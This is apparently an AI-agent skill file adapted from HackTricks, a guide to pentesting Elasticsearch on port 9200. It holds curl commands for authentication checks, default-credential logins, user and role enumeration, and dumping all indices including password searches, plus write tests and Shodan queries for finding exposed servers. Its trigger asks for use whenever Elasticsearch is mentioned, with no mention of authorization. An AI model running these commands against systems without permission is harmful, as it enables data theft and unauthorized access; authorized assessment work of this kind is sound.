Hacktricks-skills elasticsearch-pentest
Pentest and enumerate Elasticsearch instances (port 9200). Use this skill whenever the user mentions Elasticsearch, elastic, port 9200, ELK stack, or needs to enumerate/search/dump data from an Elasticsearch server. This includes checking authentication, listing indices, extracting documents, and testing write permissions.
install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest:
skills/network-services-pentesting/9200-pentesting-elasticsearch/SKILL.MDsource content
Elasticsearch Pentesting Skill
A skill for enumerating and testing Elasticsearch instances during security assessments.
When to Use This Skill
Use this skill when:
- You need to enumerate an Elasticsearch instance (port 9200)
- You want to check if authentication is enabled
- You need to list indices or dump documents
- You're testing write permissions on an Elasticsearch server
- The user mentions "Elasticsearch", "elastic", "ELK stack", "port 9200", or similar terms
Quick Start
# Basic banner check curl -X GET "http://TARGET:9200/" # Check if authentication is disabled curl -X GET "http://TARGET:9200/_xpack/security/user" # List all indices curl -X GET "http://TARGET:9200/_cat/indices?v"
Authentication Testing
Check if Auth is Disabled
By default, Elasticsearch doesn't have authentication enabled. Test this:
curl -X GET "http://TARGET:9200/_xpack/security/user"
Response indicating NO auth:
{"error":{"root_cause":[{"type":"exception","reason":"Security must be explicitly enabled..."}]},"status":500}
Response indicating auth IS enabled:
{"error":{"root_cause":[{"type":"security_exception","reason":"missing authentication credentials..."}]},"status":401}
Default Credentials to Try
If authentication is enabled, try these default credentials:
| Username | Default Password |
|---|---|
| elastic | changeme |
| elastic | password |
| elastic | elastic |
| kibana_system | changeme |
| logstash_system | changeme |
| beats_system | changeme |
| remote_monitoring_user | changeme |
curl -X GET "http://elastic:changeme@TARGET:9200/"
Enumeration
List All Available Endpoints
# Get all _cat endpoints curl -X GET "http://TARGET:9200/_cat" # Get cluster info curl -X GET "http://TARGET:9200/_cluster/health" curl -X GET "http://TARGET:9200/_cluster/settings" curl -X GET "http://TARGET:9200/_cluster/state"
User and Role Enumeration
# List all users curl -X GET "http://TARGET:9200/_security/user" # List all roles curl -X GET "http://TARGET:9200/_security/role" # Get specific user info curl -X GET "http://TARGET:9200/_security/user/USERNAME"
Index Enumeration
# List all indices with details curl -X GET "http://TARGET:9200/_cat/indices?v" # Get index mapping/schema curl -X GET "http://TARGET:9200/INDEX_NAME" # Get index settings curl -X GET "http://TARGET:9200/INDEX_NAME/_settings"
Data Extraction
Dump All Documents from an Index
# Default returns 10 documents curl -X GET "http://TARGET:9200/INDEX_NAME/_search?pretty=true" # Dump all documents (adjust size as needed) curl -X GET "http://TARGET:9200/INDEX_NAME/_search?pretty=true&size=10000"
Dump All Documents from All Indices
curl -X GET "http://TARGET:9200/_search?pretty=true&size=10000"
Search for Specific Content
# Search all indices curl -X GET "http://TARGET:9200/_search?pretty=true&q=SEARCH_TERM" # Search specific index curl -X GET "http://TARGET:9200/INDEX_NAME/_search?pretty=true&q=SEARCH_TERM" # Search with regex curl -X GET "http://TARGET:9200/_search?pretty=true&q=.*password.*"
Write Permission Testing
Create a Test Document
curl -X POST "http://TARGET:9200/testindex/testtype" -H "Content-Type: application/json" -d' { "testId": "PENTEST-001", "author": "Pentester", "timestamp": "'$(date -Iseconds)'", "note": "Testing write permissions" }'
Verify Write Access
# Check if test index was created curl -X GET "http://TARGET:9200/_cat/indices?v" | grep testindex # Read back the document curl -X GET "http://TARGET:9200/testindex/testtype/PENTEST-001?pretty=true"
Cleanup Test Data
# Delete test index curl -X DELETE "http://TARGET:9200/testindex"
Useful Endpoints Reference
| Endpoint | Purpose |
|---|---|
| List all indices |
| List cluster nodes |
| Show shard allocation |
| Cluster health status |
| List backup repositories |
| List installed plugins |
| List index aliases |
| Detailed health info |
| Cluster settings |
| Node statistics |
| List users (auth required) |
| List roles (auth required) |
| Search all indices |
Automated Tools
Nmap NSE Scripts
# Using nmap-elasticsearch-nse nmap --script elasticsearch-info -p 9200 TARGET nmap --script elasticsearch-indices -p 9200 TARGET
Metasploit
msfconsole use auxiliary/scanner/elasticsearch/indices_enum set RHOSTS TARGET run
Horuz (Fuzzing)
# https://github.com/misalabs/horuz horuz -t TARGET -p 9200
Shodan Queries
# Find Elasticsearch instances port:9200 elasticsearch # Find unauthenticated instances port:9200 elasticsearch "You know, for search" # Find specific versions port:9200 elasticsearch "version.number":"7."
Common Vulnerabilities to Check
- No Authentication - Default installations often have no auth
- Default Credentials -
is commonelastic:changeme - Cross-Site Scripting (XSS) - In Kibana dashboards
- Remote Code Execution - Via Groovy scripts in older versions
- Privilege Escalation - Weak role configurations
- Data Exposure - Sensitive data in indices
- Write Access - Ability to inject malicious documents
Workflow Summary
- Reconnaissance - Check banner, version, and authentication status
- Enumeration - List indices, users, roles, and cluster info
- Data Extraction - Dump documents from indices
- Write Testing - Attempt to create/modify documents
- Privilege Escalation - Test for superuser access
- Cleanup - Remove any test data created
Notes
- Elasticsearch uses HTTP/HTTPS (default port 9200)
- Documents are stored as JSON
- Default result limit is 10 documents per query
- Use
parameter to increase result countsize - Some endpoints require authentication
- Always clean up test data after testing
- Be careful with production systems - read operations are safe, write operations can cause issues